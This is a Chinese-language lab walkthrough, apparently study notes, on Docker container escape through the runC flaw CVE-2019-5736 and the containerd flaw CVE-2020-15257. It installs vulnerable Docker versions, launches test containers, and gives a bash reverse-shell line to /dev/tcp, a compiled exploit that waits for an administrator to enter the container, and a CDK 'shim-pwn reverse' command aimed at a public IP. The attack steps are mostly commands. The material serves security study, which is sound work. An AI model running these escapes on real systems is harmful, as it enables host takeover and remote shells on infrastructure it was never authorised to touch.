云原生-Docker安全-容器逃逸&系统内核漏洞
细节部分在权限提升章节会详解,常用:
CVE-2016-5195 CVE-2019-16884 CVE-2021-3493
CVE-2021-22555 CVE-2022-0492 CVE-2022-0847 CVE-2022-23222
云原生-Docker安全-容器逃逸&docker版本漏洞
CVE-2019-5736 runC容器逃逸(需要管理员配合触发)
影响版本:
Docker version <= 18.09.2
RunC version <= 1.0-rc6
1、安装docker对应版本
apt-get update
apt-get install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://mirrors.tencentyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
sudo add-apt-repository "deb [arch=amd64] https://mirrors.tencentyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable"
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=18.06.1~ce~3-0~ubuntu
docker --version
data:image/s3,"s3://crabby-images/b1271/b1271a8f84e9c85c01cae6e5eecae2ca44803bba" alt=""
2、启动靶场环境测试
docker run -itd --cap-add=SYS_ADMIN ubuntu:latest
data:image/s3,"s3://crabby-images/9de0f/9de0f27a07c195fe3ad4fc23f378cd627df66c74" alt=""
docker ps
docker exec -it 1f1532ed764b /bin/bash
ls -la /
data:image/s3,"s3://crabby-images/08ac4/08ac4b6b514aa70b87fd3f47527044ab3c85eb36" alt=""
3、编译修改后EXP后等待管理员进入容器执行
bash -c 'exec bash -i >& /dev/tcp/127.0.0.1/8080 0>&1'
data:image/s3,"s3://crabby-images/8f08c/8f08c4bc076d4553d460db27e912280cd21f1728" alt=""
修改完毕后,要把这个main.go编译成main文件
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
data:image/s3,"s3://crabby-images/e4f52/e4f52e25844f6897e6a1824c9d56a5b35faed1be" alt=""
docker cp main c58ad026dad2:/
data:image/s3,"s3://crabby-images/ae6f9/ae6f957ad99132d9b0e1ec8e8266c31b470dbe19" alt=""
chmod 777 main
data:image/s3,"s3://crabby-images/60f32/60f327118767788f5a64c31cba195a1ab89c96d1" alt=""
等待
data:image/s3,"s3://crabby-images/75cd3/75cd387d4272ba8eb8defd80ec881611de168f36" alt=""
管理员进入
docker exec -it 1f1532ed764b /bin/bash
data:image/s3,"s3://crabby-images/970e0/970e08e0ad0a295b961868dac9edb502d6ee023d" alt=""
上线成功了
data:image/s3,"s3://crabby-images/325da/325dadcf040407a9c906b6a120851a802b642093" alt=""
4、实验获取云服务器上docker搭建的Web权限后进行逃逸
docker run -it -p 8888:8080 vulhub/struts2:s2-053
环境安装失败
CVE-2020-15257 containerd逃逸(启动容器时有前提参数)
影响版本:
containerd < 1.4.3
containerd < 1.3.9
1、安装docker对应版本
apt-get update
安装必要依赖
apt-get install apt-transport-https ca-certificates curl software-properties-common
配置阿里源加速
curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
增加仓库
add-apt-repository "deb [arch=amd64] http://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable"
更新缓存
apt-get update
apt-cache madison docker-ce
apt-get install -y docker-ce=5:19.03.7~3-0~ubuntu-xenial docker-ce-cli=5:19.03.7~3-0~ubuntu-xenial containerd.io=1.2.4-1
docker version
data:image/s3,"s3://crabby-images/e7cc3/e7cc3d43f7b5b0dbe506e2b54cc49b16c523ceec" alt=""
2、启动环境测试:
docker pull ubuntu:18.04
docker run -itd --net=host ubuntu:18.04 /bin/bash //--net=host是前提条件,不加这个参数启动的docker没有这个漏洞
docker exec -it 0e3f3d63e5da /bin/bash
data:image/s3,"s3://crabby-images/55cc6/55cc639e64d00229e117f02ef620db41ec792555" alt=""
3、上传CDK工具自动逃逸反弹
data:image/s3,"s3://crabby-images/6ecc4/6ecc4e518b25a13fa4b8137a9fd41cd7f3c11024" alt=""
docker cp cdk_linux_amd64 0e3f3d63e5da:/tmp
data:image/s3,"s3://crabby-images/666cd/666cd7c6a8194675bc7012dff37a17412b262011" alt=""
chmod 777 cdk_linux_amd64
./cdk_linux_amd64 run shim-pwn reverse 111.230.109.74 5566 //这是指定漏洞利用
./cdk_linux_amd64 auto-escape id //自动化漏洞扫描
data:image/s3,"s3://crabby-images/080fc/080fc5328b5cc9328af4d54ce971f6aae8b6413e" alt=""
data:image/s3,"s3://crabby-images/84589/84589cbddd694b4685ec0458aeb9e58ff3e9a567" alt=""